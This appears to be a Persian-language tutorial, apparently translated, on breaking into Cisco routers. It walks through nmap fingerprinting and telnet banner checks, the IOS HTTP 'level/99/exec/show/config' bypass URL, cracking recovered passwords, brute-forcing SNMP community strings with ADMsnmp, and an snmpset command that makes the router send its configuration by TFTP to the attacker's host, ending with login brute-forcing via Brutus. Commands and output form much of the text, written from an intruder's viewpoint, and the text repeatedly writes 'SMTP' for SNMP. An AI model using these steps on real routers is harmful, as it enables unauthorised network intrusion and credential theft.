مترجم سایت

شناسايي يك روتر :

روتر ها مي توانند همانند ديگر
دستگاه هاي موجود در شبكه تنظيم شوند - مي توان بر روي آن يك وب سرور ايجاد نمود و
در بيشتر مواقع توانايي پشتيباني چند سرور را نيز دارا هستند . البته يادآور شوم كه
گاهي نيز با سيستم عامل يونيكس اشتباه گرفته مي شود !

شايد آسان ترين و دقيق ترين راه
جهت شناسايي يك هاست در شبكه بر روتر استفاده از نرم افزار NMAP
باشد كه پورت اسكنر آن داراي فينگرپرينتينگ بسيار دقيق در شناسايي
سيستم عامل هاست . يك پويش پورت در يك روتر سيسكو ممكن است اين چنين باشد :

Interesting ports on router1:

(The 168 ports scanned but not shown below are in state: closed)

Port       State       Service

7/tcp      open        echo

9/tcp      open        discard

13/tcp     open        daytime

19/tcp     open        chargen

23/tcp     open        telnet

79/tcp     open        finger

2001/tcp   open        dc

4001/tcp   open        unknown

6001/tcp   open        X11:1

9001/tcp   open        unknown

Remote operating system guess: Cisco Router/Switch with IOS 11.2

اگر دسترسي به يك سرويس ورود به
سيستم نظير تل نت يا SSH امكان پذير باشد فرد مي تواند به
سادگي از يك كلاينت تل نت استفاده نموده و به پورت مورد نظر وصل گردد . يك روتر
ساده سيسكو اين چنين است :

[root@unix root]# telnet router1

Trying router1...

Connected to router1.

Escape character is '^]'.





User Access Verification



Password:

User Access Verification
در اينجا بنر سيسكو در تل نت است كه البته در بعضي موارد مديران
شبكه جهت فعاليت هاي خود آن را تغيير مي دهند .

http://freshmeat.net/redir/sing/9570/url_tgz/SING-current.tar.gz
SING نرم افزاري ست كه
جهت اسمبل نمودن پكت هاي ICMP
استفاده مي شود . جهت پذيرش درخواست هاي ICMP
( نوع 17 ) به طور نرمال تنها دستگاه هايي هسنتد كه به اين پكت هاي جواب مي دهند .
هم چنين ارسال اين گونه پكت هاي ICMP ما را در جهت يافتن
روتر ها ياري مي نمايد .

هم چنين استفاده از
traceroute
در جهت يافتن روتر ها بسيار آسان است . البته روش هاي ديگري نيز وجود دارند ولي يك
كلاينت تل نت يا نت كت در جهت برقراري ارتباط و صحت وجود روتر ها لازم است .

شناسايي آسيب پذيري هاي روتر ها :

آسيب پذيري كه بيشتر روتر
هاي سيسكو را تحت پوشش قرار مي دهد آسيب پذيري
http://www.securityfocus.com/bid/2936 size="2">
HTTP Configuration Arbitrary Administrative Access
مي باشد . اين ‌آسيب پذيري توسط بيشتر نرم افزارهاي پويش آسيب
پذيري ها قابل شناسايي ست كه در بيشتر موارد امكان دسترسي كامل به قسمت
مديريت روتر را مي دهد . حال ما جهت شروع كار به يك مرورگر نظير آن چه كه در عكس
پايين است احتياج داريم :

Figure 1: Cisco Router HTTP
Basic Authentication Prompt

بعد از اينكه
Cancel را انتخاب نموديم به چنين آدسي در مرورگر فراخوانده
مي شويم :

http://10.0.1.252/level/99/exec/show/config
http://10.0.1.252/level/99/exec/show/config

Figure
2: Cisco Router Config Displayed

در اينجا به‌ آساني
تنظيمات روتر قابل رويت است و ما دقيقا متوجه مي شويم كه تنظيمات روتر چگونه است
مانند ليست كنترل دسترسي ( ACLS
) يا استرينگ هاي SNMP و كلمه هاي
عبور رمز گذاري شده !

خوب جهت دسترسي به كلمه هاي
عبور نرم افزار GetPass
از
http://www.boson.com/
Boson پيشنهاد مي شود :

Figure 3: Decrypting a
Vigenere Password

البته ابزار هاي ديگري نيز وجود
دارند كه اين كار را انجام مي دهند كه بيشتر آن ها رايگان هستند . غير از اين ها
صفحه هاي وب با اسكريپت هاي سي-جي-اي ديگري نيز هستند كه عمل بازگشايي پسورد را
انجام مي دهند . هنگامي كه پسورد كراك شد نفوذگر با استفاده از تل نت به روتر
دسترسي كامل به صورت مديريت پيدا مي كند .

حمله به روش بروت فرس :
SMTP

يك پويش گر پورت ساده ممكن پورتي
را با شماره 169 در يو-دي-پي باز نشان دهد و آن قابل ارتباط بداند . در حال
حاضر تعدادي نرم افزار وجود دارند كه عمل بروت فرس در اس-ام-تي-پي را انجام مي دهند
كه نرم افزار سولار ويندز يكي از آن هاست .

بهرحال جهت اس-ام-تي-پي نرم
افزار رايگان
http://www.freshports.org/security/ADMsnmp/
ADMsnmp توصيه مي شود كه
توسط گروه ADM
نوشته شده است . اين نرم افزار از طريق يك ليست كلمه ها عمل مي كند و سعي در حدس
زدن استرينگ مي نمايد .

در شكل زير نرم افزار گروه
اي-دي-ام را نشان مي دهد كه در حال حدس زدن كاميونيتي استرينگ مورد نظر است :

Figure 4: ADMsnp Guessing a
Read/Write Community String

استرينگ
send setrequest در
عكس بالا به كاربر اطلاع مي دهد كه دسترسي نوشتن/خواندن را به سيستم مورد نظر پيدا
نموده است . اولين چيزي كه بعد از دسترسي به روتر به فكر مي رسد استفاده از
MIB يا Management Information Base
است .

[root@hackyou root]# snmpwalk -v 1 -c duckling 10.0.1.252 | head

SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software 

IOS (tm) 2500 Software (C2500-I-L), Version 12.0(14), RELEASE SOFTWARE (fc1)

Copyright (c) 1986-2000 by cisco Systems, Inc.

Compiled Tue 31-Oct-00 23:59 by linda

SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.30

SNMPv2-MIB::sysUpTime.0 = Timeticks: (103607424) 11 days, 23:47:54.24

SNMPv2-MIB::sysContact.0 = STRING: 

SNMPv2-MIB::sysName.0 = STRING: ADMsnmp

SNMPv2-MIB::sysLocation.0 = STRING: 

SNMPv2-MIB::sysServices.0 = INTEGER: 6

بعد از اينكه متوجه شديم دستگاه
مورد نظر روتر است و سيسكو ست با استفاده از تي-اف-تي-پي فايل كانفيگ را به سيستم
خود مي فرستيم :

[root@hackyou root]# snmpset 10.0.1.252 duckling 

.1.3.6.1.4.1.9.2.1.55.192.168.1.15 s "config"

enterprises.9.2.1.55.192.168.1.15 = "config"

البته سولار ويندز هم
ابزاري دارد كه كار مورد نظر را انجام مي دهد كه در پلافورم ويندوز اجرا مي شود كه
البته جهت كاربران لينوكس نرم افزار
http://www.ece.ucdavis.edu/ucd-snmp/
UCD-SNMP توصيه مي شود .

Solarwinds MIB browser
در صورتي كه اس-ام-تي-پي تنها مكانيزم جهت دسترسي به ديوايس مورد نظر باشد مي تواند
بسيار كارآمد باشد كه داراي MIB
بسياري جهت سيستم عامل هاي مختلف و ديوايس هاي مختلف است .

شكل زير يك
MIB جنريك در سيسكو را نشان مي دهد :

Figure 5: Solarwinds MIB
Browser on a Cisco Device

بروت فرس نمودن
سرويس هاي ورود

بروت فورس
نمودن اين سرويس ها مانند تل نت در بيشتر مواقع مشكل است كه يكي از اقداماتي كه قبل
از بروت فرس بايد انجام دهيم اين است كه روتر از چه نوع
authentication استفاده
مي كند مانند Tacacs يا Radius
.

يكي از‌ آسان
ترين روش جهت اينكه متوجه شويم آيا روتر از
authentication استفاده مي كند استفاده
از تل نت و وصل شدن به آن است :

[root@hackyou root]# telnet router2

Trying router2...

Connected to router2.

Escape character is '^]'.





User Access Verification



Username:

اگر درخواست
نام كاربري شد شما مي توانيد اطميانان حاصل نماييد كه روتر از يكي از روش هاي
authentication
استفاده مي كند . البته اگر سرويس فينگر در سيستم اجرا باشد بدست آوردن نام
كاربري نيز امكان پذير است .

البته جهت
بروت فرس ابزار هاي بساري هسنتد كه مي توانند عمل بروت فرس را از پروتكول هاي مختلف
انجام دهند مانند
http://www.hoobie.net/brutus
Brutus ...

توسط : احسان اميدوار
ehsan_omidvar@mail.com